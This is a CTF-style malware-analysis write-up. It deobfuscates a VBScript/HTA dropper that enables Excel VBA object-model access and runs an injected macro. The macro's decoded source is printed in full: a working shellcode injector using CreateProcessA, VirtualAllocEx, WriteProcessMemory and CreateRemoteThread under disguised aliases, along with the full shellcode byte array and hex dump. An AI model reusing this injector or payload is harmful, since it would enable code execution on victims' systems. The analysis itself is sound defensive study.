Chr(44)&Chr(45)&""88""&Chr(44)&Chr(45)&""5""&Chr(44)&""83""&Chr(44)&Chr(45)&""61""&Chr(44)&Chr(45)&""46""&Chr(44)&Chr(45)&""115""&Chr(44)&""58""&Chr(44)&Chr(45)&""81""&Chr(44)&""49""&Chr(44)&""21""&Chr(44)&Chr(45)&""46""&Chr(44)& _
""66""&Chr(44)&""43""&Chr(44)&Chr(45)&""68""&Chr(44)&""66""&Chr(44)&Chr(45)&""77""&Chr(44)&Chr(45)&""59""&Chr(44)&""81""&Chr(44)&Chr(45)&""76""&Chr(44)&Chr(45)&""125""&Chr(44)&""77""&Chr(44)&Chr(45)&""17""&Chr(44)&Chr(45)&""79""& _
Chr(44)&""116""&Chr(44)&""94""&Chr(44)&Chr(45)&""80""&Chr(44)&""2""&Chr(44)&""72""&Chr(44)&Chr(45)&""22""&Chr(44)&""17""&Chr(44)&Chr(45)&""7""&Chr(44)&Chr(45)&""58""&Chr(44)&""33""&Chr(44)&Chr(45)&""14""&Chr(44)&""113""&Chr(44)& _
""127""&Chr(44)&""119""&Chr(44)&""127""&Chr(44)&""26""&Chr(44)&""76""&Chr(44)&""37""&Chr(44)&""2""&Chr(44)&Chr(45)&""38""&Chr(44)&Chr(45)&""38""&Chr(44)&""96""&Chr(44)&Chr(45)&""44""&Chr(44)&Chr(45)&""18""&Chr(44)&Chr(45)&""102""& _
Chr(44)&Chr(45)&""116""&Chr(44)&Chr(45)&""15""&Chr(44)&Chr(45)&""124""&Chr(44)&Chr(45)&""37""&Chr(44)&""110""&Chr(44)&Chr(45)&""109""&Chr(44)&Chr(45)&""112""&Chr(44)&Chr(45)&""117""&Chr(44)&Chr(45)&""26""&Chr(44)&""97""&Chr(44)& _
Chr(45)&""91""&Chr(44)&""42""&Chr(44)&""76""&Chr(44)&Chr(45)&""20""&Chr(44)&""67""&Chr(44)&""70""&Chr(44)&Chr(45)&""94""&Chr(44)&Chr(45)&""72""&Chr(44)&Chr(45)&""36""&Chr(44)&Chr(45)&""1""&Chr(44)&""91""&Chr(44)&Chr(45)&""31""& _
Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""98""&Chr(44)&Chr(45)&""92""&Chr(44)&""60""&Chr(44)&Chr(45)&""46""&Chr(44)&Chr(45)&""95""&Chr(44)&""47""&Chr(44)&Chr(45)&""76""&Chr(44)&""34""&Chr(44)&""111""&Chr(44)&Chr(45)&""40""&Chr(44)& _
Chr(45)&""67""&Chr(44)&""48""&Chr(44)&Chr(45)&""104""&Chr(44)&Chr(45)&""65""&Chr(44)&""61""&Chr(44)&Chr(45)&""55""&Chr(44)&""89""&Chr(44)&""42""&Chr(44)&""61""&Chr(44)&Chr(45)&""93""&Chr(44)&""93""&Chr(44)&Chr(45)&""4""&Chr(44)& _
""106""&Chr(44)&""91""&Chr(44)&""92""&Chr(44)&Chr(45)&""39""&Chr(44)&""92""&Chr(44)&Chr(45)&""60""&Chr(44)&Chr(45)&""97""&Chr(44)&""12""&Chr(44)&Chr(45)&""33""&Chr(44)&""3""&Chr(44)&""95""&Chr(44)&Chr(45)&""47""&Chr(44)&Chr(45)& _
""23""&Chr(44)&""120""&Chr(44)&""86""&Chr(44)&""71""&Chr(44)&""85""&Chr(44)&""23""&Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""121""&Chr(44)&""85""&Chr(44)&Chr(45)&""25""&Chr(44)&Chr(45)&""63""&Chr(44)&Chr(45)&""51""&Chr(44)&""85""& _
Chr(44)&Chr(45)&""113""&Chr(44)&Chr(45)&""75""&Chr(44)&Chr(45)&""75""&Chr(44)&""6""&Chr(44)&Chr(45)&""86""&Chr(44)&Chr(45)&""71""&Chr(44)&""99""&Chr(44)&""59""&Chr(44)&""103""&Chr(44)&""44""&Chr(44)&Chr(45)&""116""&Chr(44)&""109""& _
Chr(44)&Chr(45)&""37""&Chr(44)&Chr(45)&""25""&Chr(44)&Chr(45)&""28""&Chr(44)&Chr(45)&""109""&Chr(44)&""2""&Chr(44)&Chr(45)&""49""&Chr(44)&Chr(45)&""86""&Chr(44)&""108""&Chr(44)&""97""&Chr(44)&""83""&Chr(44)&Chr(45)&""84""&Chr(44)& _
Chr(45)&""110""&Chr(44)&Chr(45)&""9""&Chr(44)&""124""&Chr(44)&""21""&Chr(44)&Chr(45)&""6""&Chr(44)&""7""&Chr(44)&""61""&Chr(44)&Chr(45)&""91""&Chr(44)&Chr(45)&""6""&Chr(44)&""109""&Chr(44)&Chr(45)&""67""&Chr(44)&Chr(45)&""11""& _
Chr(44)&Chr(45)&""110""&Chr(44)&""122""&Chr(44)&Chr(45)&""110""&Chr(44)&Chr(45)&""6""&Chr(44)&""82""&Chr(44)&Chr(45)&""126""&Chr(44)&""57""&Chr(44)&""83""&Chr(44)&Chr(45)&""6""&Chr(44)&""9""&Chr(44)&Chr(45)&""84""&Chr(44)&""17""& _
Chr(44)&Chr(45)&""101""&Chr(44)&""14""&Chr(44)&Chr(45)&""27""&Chr(44)&Chr(45)&""12""&Chr(44)&""5""&Chr(44)&""14""&Chr(44)&""10""&Chr(44)&""45""&Chr(44)&Chr(45)&""74""&Chr(44)&""117""&Chr(44)&""95""&Chr(44)&Chr(45)&""46""&Chr(44)& _
""55""&Chr(44)&Chr(45)&""118""&Chr(44)&Chr(45)&""119""&Chr(44)&Chr(45)&""73""&Chr(44)&""56""&Chr(44)&Chr(45)&""118""&Chr(44)&Chr(45)&""75""&Chr(44)&Chr(45)&""55""&Chr(44)&""5""&Chr(44)&""92""&Chr(44)&Chr(45)&""116""&Chr(44)&Chr(45)& _
""65""&Chr(44)&""72""&Chr(44)&""92""&Chr(44)&Chr(45)&""85""&Chr(44)&Chr(45)&""80""&Chr(44)&Chr(45)&""1""&Chr(44)&Chr(45)&""63""&Chr(44)&Chr(45)&""102""&Chr(44)&""90""&Chr(44)&Chr(45)&""1""&Chr(44)&""86""&Chr(44)&Chr(45)&""36""&Chr(44)& _
""78""&Chr(41)&Chr(10)&"" If L""&""en""&Chr(40)&""Environ""&Chr(40)&Chr(34)& _
""ProgramW""&""6432""&Chr(34)&Chr(41)&Chr(41)&"" ""&Chr(62)&"" 0 Then""&Chr(10)&"" ""&""sProc ""&Chr(61)&"" Environ""&Chr(40)&Chr(34)&""windir""&Chr(34)&Chr(41)&"" ""&Chr(38)&"" ""&Chr(34)&Chr(92)&Chr(92)&""SysWOW64""& _
Chr(92)&Chr(92)&""rundll32""&Chr(46)&""exe""&Chr(34)&Chr(10)&"" Else""&Chr(10)&"" ""&""sProc ""&Chr(61)&"" Environ""&Chr(40)&Chr(34)&""windir""&Chr(34)&Chr(41)&"" ""&Chr(38)&"" ""&Chr(34)&Chr(92)&Chr(92)&""System32""& _
Chr(92)&Chr(92)&""rundll32""&Chr(46)&""exe""&Chr(34)&Chr(10)&"" End ""&""If""&Chr(10)&Chr(10)&"" res ""&Chr(61)&"" RunStuf""&""f""&Chr(40)&""sNull""&Chr(44)&"" sProc""&Chr(44)&"" ByVal 0""&Chr(38)&Chr(44)&"" ByVal 0""& _
Chr(38)&Chr(44)&"" ByVal 1""&Chr(38)&Chr(44)&"" ByVal 4""&Chr(38)&Chr(44)&"" ByVal 0""&Chr(38)&Chr(44)&"" sNull""&Chr(44)&"" sInfo""&Chr(44)&"" pInfo""&Chr(41)&Chr(10)&Chr(10)&"" rwxp""&""age ""&Chr(61)&"" AllocSt""& _
""uff""&Chr(40)&""pInfo""&Chr(46)&""hProcess""&Chr(44)&"" 0""&Chr(44)&"" UBound""&Chr(40)&""myArray""&Chr(41)&Chr(44)&"" ""&Chr(38)&""H1000""&Chr(44)&"" ""&Chr(38)&""H40""&Chr(41)&Chr(10)&"" For ""&""offset ""&Chr(61)&"" LBound""& _
Chr(40)&""myArray""&Chr(41)&"" To UBou""&""nd""&Chr(40)&""myArray""&Chr(41)&Chr(10)&"" ""&""myByte ""&Chr(61)&"" myArray""&Chr(40)&""offset""&Chr(41)&Chr(10)&"" ""&""res ""&Chr(61)&"" WriteSt""&""uff""&Chr(40)&""pInfo""& _
Chr(46)&""hProcess""&Chr(44)&"" rwxpage""&"" ""&Chr(43)&"" offset""&Chr(44)&"" myByte""&Chr(44)&"" 1""&Chr(44)&"" ByVal 0""&Chr(38)&Chr(41)&Chr(10)&"" Next""&"" offset""&Chr(10)&"" res ""&Chr(61)&"" CreateS""&""tuff""&Chr(40)& _
""pInfo""&Chr(46)&""hProcess""&Chr(44)&"" 0""&Chr(44)&"" 0""&Chr(44)&"" rwxpage""&Chr(44)&"" 0""&Chr(44)&"" 0""&Chr(44)&"" 0""&Chr(41)&Chr(10)&""End Sub""&Chr(10)&""Sub Auto""&""Open""&Chr(40)&Chr(41)&Chr(10)&"" Auto""&""_Open""& _
Chr(10)&""End Sub""&Chr(10)&""Sub Work""&""book_Ope""&""n""&Chr(40)&Chr(41)&Chr(10)&"" Auto""&""_Open""&Chr(10)&""End Sub""&Chr(10)
objExcel.DisplayAlerts = False
on error resume next
objExcel.Run ""Auto_Open""
objWorkbook.Close False
objExcel.Quit
' Restore the registry to its old state
if action = """" then
WshShell.RegDelete RegPath
else
WshShell.RegWrite RegPath, action, ""REG_DWORD""
end if
self.close
</script></head></html>"
```
The very first line already tells me this file is VBScript; the head and the tail are in a form I can read, while the middle is obfuscated.
For the first part, everything from the `macro` line upwards:
::: success
This part uses VBScript to tamper with Microsoft Excel's security settings. It checks whether a specific registry value exists and then changes it so that the script may push macro (VBA) code into Excel programmatically. Concretely it sets AccessVBOM ("Trust access to the VBA project object model") to 1, which is what lets a script add VBA code to a workbook at runtime instead of shipping a pre-made macro document.
:::
For the last part:
::: success
This part runs `Auto_Open` under `On Error Resume Next`, so any error raised while the macro runs is silently swallowed, then closes the workbook without saving, quits Excel and restores AccessVBOM to its previous state: the value is deleted if it did not exist before (`action` is empty), otherwise the old REG_DWORD is written back.
:::
The middle part is the one I need to dig into. Looking closely, it is one long string built from `Chr(number)` calls and `""..""` literals joined with `&` (the quotes are doubled because the VBA text sits inside a VBScript string literal). I'll use CyberChef to deobfuscate it, starting with two find/replace passes:
| Find | Replace |
| -------- | -------- |
| `""` | `"` |
| `"&"` | (nothing) |

Next I paste the output into VS Code to tidy it up a bit (installing a VBA extension makes it easier to read and edit); this step only needs some care and a little knowledge of VBA syntax, since I did it by hand =))
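The find/replace passes plus the `Chr()` decoding can also be scripted, so the whole dump is decoded in one pass instead of by hand. The following Python is an added example and not part of the original writeup: it walks the obfuscated expression left to right, emits each `""..""` literal verbatim and each `Chr(n)` as the character with code `n`, and ignores the `&` glue and the ` _` line continuations. `SAMPLE`, `deobfuscate_chr_concat` and `_TOKEN` are my own names; `SAMPLE` is a constructed fragment in the same notation as the dump above, not the full dump.

```python
import re
import sys

# Constructed fragment in the dump's notation: the VBA text is carried inside a
# VBScript string, so its own quotes are doubled (""...."") and punctuation is
# spelled as Chr(n); & joins the pieces and " _" continues the line.
SAMPLE = (
    '"" res ""&Chr(61)&"" RunStuf""&""f""&Chr(40)&""sNull""&Chr(44)&"" sProc""&Chr(41)&Chr(10)& _\n'
    '""End Sub""&Chr(10)&""Sub Auto""&""Open""&Chr(40)&Chr(41)&Chr(10)'
)

# One token is either a doubled-quote literal or a Chr(n) call; the glue
# between tokens (&, spaces, the " _" continuation, newlines) carries no content.
_TOKEN = re.compile(r'""([^"]*)""|Chr\((\d+)\)')


def deobfuscate_chr_concat(obfuscated: str) -> str:
    """Evaluate the string-concatenation expression the VBScript builds.

    Literals are copied verbatim (doubled quotes stripped) and each Chr(n)
    becomes chr(n), in source order. Split identifiers such as
    ""RunStuf""&""f"" join back up because nothing is emitted for the &.
    Feed it only the obfuscated middle region: readable VBScript lines such as
    objExcel.Run ""Auto_Open"" would otherwise contribute stray literals.
    """
    pieces = []
    for literal, code in _TOKEN.findall(obfuscated):
        pieces.append(chr(int(code)) if code else literal)
    return "".join(pieces)


if __name__ == "__main__":
    # Usage: python3 decode_macro.py < middle_region.txt > macro.vba
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    sys.stdout.write(deobfuscate_chr_concat(text))
```

Negative array entries such as `Chr(45)&""80""` come out as the text `-80`, so the decoded `Array(...)` line can be pasted straight into the tidied macro.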
Here is the VBA after I tidied it up as far as I could:
```vb=
' Structures filled in by CreateProcessA (imported as RunStuff below)
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChar As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
' The injection APIs are imported under harmless-looking aliases:
'   CreateStuff = CreateRemoteThread, AllocStuff = VirtualAllocEx,
'   WriteStuff  = WriteProcessMemory, RunStuff   = CreateProcessA
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String
#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    ' Shellcode, one signed byte (-128..127) per element
    myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98,49,123,24,3,123,24,-125,-61,36,-76,-73,-126,-52,-70,56,123,12,-37,-79,-98,61,-37,-90,-21,109,-21,-83,-66,-127,-128,-32,42,18,-28,44,92,-109,67,11,83,36,-1,111,-14,-90,2,-68,-44,-105,-52,-79,21,-48,49,59,71,-119,62,-18,120,-66,11,51,-14,-116,-102,51,-25,68,-100,18,-74,-33,-57,-76,56,12,124,-3,34,81,-71,-73,-39,-95,53,70,8,-8,-74,-27,117,53,69,-9,-78,-15,-74,-126,-54,2,74,-107,8,121,-112,16,-117,-39,83,-126,119,-40,-80,85,-13,-42,125,17,91,-6,-128,-10,-41,6,8,-7,55,-113,74,-34,-109,-44,9,127,-123,-80,-4,-128,-43,27,-96,36,-99,-79,-75,84,-4,-35,122,85,-1,29,21,-18,-116,47,-70,68,27,3,51,67,-36,100,110,51,114,-101,-111,68,90,95,-59,20,-12,118,102,-1,4,119,-77,80,85,-41,108,17,5,-105,-36,-7,79,24,2,25,112,-13,43,50,-88,-5,83,-61,-46,-115,58,-81,49,21,-46,66,43,-68,66,-77,-59,81,-76,-125,77,-17,-79,116,94,-80,2,72,-22,17,-7,-58,33,-14,113,127,119,127,26,76,37,2,-38,-38,96,-44,-18,-102,-116,-15,-124,-37,110,-109,-112,-117,-26,97,-91,42,76,-20,67,70,-94,-72,-36,-1,91,-31,-105,-98,-92,60,-46,-95,47,-76,34,111,-40,-67,48,-104,-65,61,-55,89,42,61,-93,93,-4,106,91,92,-39,92,-60,-97,12,-33,3,95,-47,-23,120,86,71,85,23,-105,-121,85,-25,-63,-51,85,-113,-75,-75,6,-86,-71,99,59,103,44,-116,109,-37,-25,-28,-109,2,-49,-86,108,97,83,-84,-110,-9,124,21,-6,7,61,-91,-6,109,-67,-11,-110,122,-110,-6,82,-126,57,83,-6,9,-84,17,-101,14,-27,-12,5,14,10,45,-74,117,95,-46,55,-118,-119,-73,56,-118,-75,-55,5,92,-116,-65,72,92,-85,-80,-1,-63,-102,90,-1,86,-36,78)
    ' Always pick a 32-bit rundll32.exe as the host: SysWOW64 on 64-bit Windows
    ' (ProgramW6432 is only set there), System32 on 32-bit Windows. The doubled
    ' backslashes are what the decoding produced; Win32 path normalisation
    ' collapses them.
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If
    ' CreateProcessA(..., bInheritHandles = 1, dwCreationFlags = 4 = CREATE_SUSPENDED, ...)
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
    ' VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT = &H1000, PAGE_EXECUTE_READWRITE = &H40)
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    ' WriteProcessMemory one byte at a time: only the low byte of the Long is
    ' copied, so -35 lands in the remote page as &HDD
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    ' CreateRemoteThread(hProcess, NULL, 0, rwxpage, NULL, 0, NULL): run the page
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
' Word (AutoOpen) and Excel (Workbook_Open) entry points both lead to Auto_Open
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
```
What this code does: it starts a suspended `rundll32.exe` with CreateProcessA, allocates an RWX page in it with VirtualAllocEx, copies `myArray` into that page byte by byte with WriteProcessMemory, and runs the page as a remote thread with CreateRemoteThread. The Declare lines import those four APIs under the harmless-looking aliases RunStuff, AllocStuff, WriteStuff and CreateStuff, so a quick search for the real API names in the macro would find nothing. So the thing I need to extract from this step is `myArray`.
Since the array contains negative values, I drop the idea of mapping the elements to characters as in the previous challenges. Every value fits in a signed byte (-128..127), and `myArray` is almost certainly shellcode: it is copied into another process and then executed as a thread, which is exactly what shellcode is for. So I convert it to raw bytes as a .sc file, taking each value modulo 256 (WriteProcessMemory copies the low byte of each Long, so -35 becomes 0xdd).
Converting to hex is easy so I skip the details; a small Python script or any tool will do, and it yields hex like this (the first bytes dd c1 bf 20 are the -35, -63, -65, 32 at the start of the array):
```
dd c1 bf 20 56 42 7e d9 74 24 f4 5b 31 c9 b1 62 31 7b 18 03 7b 18 83 c3
24 b4 b7 82 cc ba 38 7b 0c db b1 9e 3d db a6 eb 6d eb ad be 81 80 e0 2a
12 e4 2c 5c 93 43 0b 53 24 ff 6f f2 a6 02 bc d4 97 cc b1 15 d0 31 3b 47
89 3e ee 78 be 0b 33 f2 8c 9a 33 e7 44 9c 12 b6 df c7 b4 38 0c 7c fd 22
51 b9 b7 d9 a1 35 46 08 f8 b6 e5 75 35 45 f7 b2 f1 b6 82 ca 02 4a 95 08
79 90 10 8b d9 53 82 77 d8 b0 55 f3 d6 7d 11 5b fa 80 f6 d7 06 08 f9 37
8f 4a de 93 d4 09 7f 85 b0 fc 80 d5 1b a0 24 9d b1 b5 54 fc dd 7a 55 ff
1d 15 ee 8c 2f ba 44 1b 03 33 43 dc 64 6e 33 72 9b 91 44 5a 5f c5 14 f4
76 66 ff 04 77 b3 50 55 d7 6c 11 05 97 dc f9 4f 18 02 19 70 f3 2b 32 a8
fb 53 c3 d2 8d 3a af 31 15 d2 42 2b bc 42 b3 c5 51 b4 83 4d ef b1 74 5e
b0 02 48 ea 11 f9 c6 21 f2 71 7f 77 7f 1a 4c 25 02 da da 60 d4 ee 9a 8c
f1 84 db 6e 93 90 8b e6 61 a5 2a 4c ec 43 46 a2 b8 dc ff 5b e1 97 9e a4
3c d2 a1 2f b4 22 6f d8 bd 30 98 bf 3d c9 59 2a 3d a3 5d fc 6a 5b 5c d9
5c c4 9f 0c df 03 5f d1 e9 78 56 47 55 17 97 87 55 e7 c1 cd 55 8f b5 b5
06 aa b9 63 3b 67 2c 8c 6d db e7 e4 93 02 cf aa 6c 61 53 ac 92 f7 7c 15
fa 07 3d a5 fa 6d bd f5 92 7a 92 fa 52 82 39 53 fa 09 ac 11 9b 0e e5 f4
05 0e 0a 2d b6 75 5f d2 37 8a 89 b7 38 8a b5 c9 05 5c 8c bf 48 5c ab b0
ff c1 9a 5a ff 56 dc 4e
```
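A scripted version of that conversion, added here as an example and not part of the original writeup: it pulls the `myArray = Array(...)` literal out of the decoded macro, maps each signed value to an unsigned byte (`v & 0xFF`, so -35 becomes 0xdd), lists which real Win32 exports the aliased Declare lines resolve to, and flags the `fnstenv [esp-0xc]` GetPC instruction that self-decoding shellcode stubs start with. `DECODED_VBA` is a constructed excerpt (parameter lists shortened, only the first 16 array entries from the page); the function and constant names are my own.

```python
import re
import sys

# Constructed excerpt of the decoded macro: the four Declare lines with their
# parameter lists shortened and only the first 16 array entries from the page.
DECODED_VBA = '''\
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String) As Long
Sub Auto_Open()
    myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98)
End Sub
'''

_DECLARE = re.compile(r'Function\s+(\w+)\s+Lib\s+"([^"]+)"\s+Alias\s+"(\w+)"')

# d9 74 24 f4 = fnstenv [esp-0xc]: the GetPC trick polymorphic decoder stubs use
_FNSTENV_GETPC = b"\xd9\x74\x24\xf4"


def api_aliases(vba: str) -> dict:
    """Map each Declare alias (RunStuff, ...) to the export it really calls."""
    return {alias: f"{lib}!{real}" for alias, lib, real in _DECLARE.findall(vba)}


def array_to_shellcode(vba: str, name: str = "myArray") -> bytes:
    """Turn `name = Array(...)` into the raw bytes the macro injects.

    VBA stores each byte as a signed Long; WriteProcessMemory copies only the
    low byte, so -35 ends up in memory as 0xDD. `v & 0xFF` reproduces that.
    """
    m = re.search(rf"\b{re.escape(name)}\s*=\s*Array\(([^)]*)\)", vba, re.S)
    if m is None:
        raise ValueError(f"no Array() literal assigned to {name}")
    body = m.group(1).replace("_", "")  # drop VBA line continuations, if any
    values = [int(v) for v in body.split(",") if v.strip()]
    for v in values:
        if not -128 <= v <= 255:
            raise ValueError(f"{v} does not fit in one byte")
    return bytes(v & 0xFF for v in values)


def looks_self_decoding(shellcode: bytes, window: int = 32) -> bool:
    """Heuristic: a fnstenv-based GetPC in the first bytes usually means a
    decoder stub, i.e. strings and static disassembly of the blob will not
    show the real payload and emulation (scdbg) is the better next step."""
    return _FNSTENV_GETPC in shellcode[:window]


if __name__ == "__main__":
    # Usage: python3 extract_sc.py macro.vba   (writes out.sc, as in the writeup)
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else DECODED_VBA
    for alias, real in api_aliases(src).items():
        print(f"{alias:12s} -> {real}")
    sc = array_to_shellcode(src)
    print(f"{len(sc)} bytes, fnstenv GetPC in prologue: {looks_self_decoding(sc)}")
    with open("out.sc", "wb") as f:
        f.write(sc)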
Use xxd in reverse plain-hexdump mode (`-r -p`, which ignores the whitespace and newlines) to turn that text back into raw bytes:
```bash
echo "dd c1 bf 20 56 42 7e d9 74 24 f4 5b 31 c9 b1 62 31 7b 18 03 7b 18 83 c3
24 b4 b7 82 cc ba 38 7b 0c db b1 9e 3d db a6 eb 6d eb ad be 81 80 e0 2a
12 e4 2c 5c 93 43 0b 53 24 ff 6f f2 a6 02 bc d4 97 cc b1 15 d0 31 3b 47
89 3e ee 78 be 0b 33 f2 8c 9a 33 e7 44 9c 12 b6 df c7 b4 38 0c 7c fd 22
51 b9 b7 d9 a1 35 46 08 f8 b6 e5 75 35 45 f7 b2 f1 b6 82 ca 02 4a 95 08
79 90 10 8b d9 53 82 77 d8 b0 55 f3 d6 7d 11 5b fa 80 f6 d7 06 08 f9 37
8f 4a de 93 d4 09 7f 85 b0 fc 80 d5 1b a0 24 9d b1 b5 54 fc dd 7a 55 ff
1d 15 ee 8c 2f ba 44 1b 03 33 43 dc 64 6e 33 72 9b 91 44 5a 5f c5 14 f4
76 66 ff 04 77 b3 50 55 d7 6c 11 05 97 dc f9 4f 18 02 19 70 f3 2b 32 a8
fb 53 c3 d2 8d 3a af 31 15 d2 42 2b bc 42 b3 c5 51 b4 83 4d ef b1 74 5e
b0 02 48 ea 11 f9 c6 21 f2 71 7f 77 7f 1a 4c 25 02 da da 60 d4 ee 9a 8c
f1 84 db 6e 93 90 8b e6 61 a5 2a 4c ec 43 46 a2 b8 dc ff 5b e1 97 9e a4
3c d2 a1 2f b4 22 6f d8 bd 30 98 bf 3d c9 59 2a 3d a3 5d fc 6a 5b 5c d9
5c c4 9f 0c df 03 5f d1 e9 78 56 47 55 17 97 87 55 e7 c1 cd 55 8f b5 b5
06 aa b9 63 3b 67 2c 8c 6d db e7 e4 93 02 cf aa 6c 61 53 ac 92 f7 7c 15
fa 07 3d a5 fa 6d bd f5 92 7a 92 fa 52 82 39 53 fa 09 ac 11 9b 0e e5 f4
05 0e 0a 2d b6 75 5f d2 37 8a 89 b7 38 8a b5 c9 05 5c 8c bf 48 5c ab b0
ff c1 9a 5a ff 56 dc 4e" | xxd -r -p > out.sc
```
At this point I use [SCDbg](http://sandsprite.com/blogs/index.php?uid=7&pid=152), a shellcode emulator that is very good at this; here I run out.sc in it (for example `scdbg /f out.sc`) and watch what it does. Emulation rather than strings or static disassembly is the right tool here: the first instructions of the blob (`mov edi, 0x7e425620`; `fnstenv [esp-0xc]`; `pop ebx`; `xor ecx, ecx`; `mov cl, 0x62`; `xor [ebx+0x18], edi`; `add edi, [ebx+0x18]`; ...) are the GetPC-plus-XOR-loop pattern of a polymorphic decoder such as msfvenom's shikata_ga_nai, so the real payload only appears after the stub decodes itself. SCDbg emulates 32-bit code, which matches the macro: it always injects into the 32-bit rundll32.exe (SysWOW64 on 64-bit Windows).

With that I have the flag; the hard rating on this challenge is well deserved.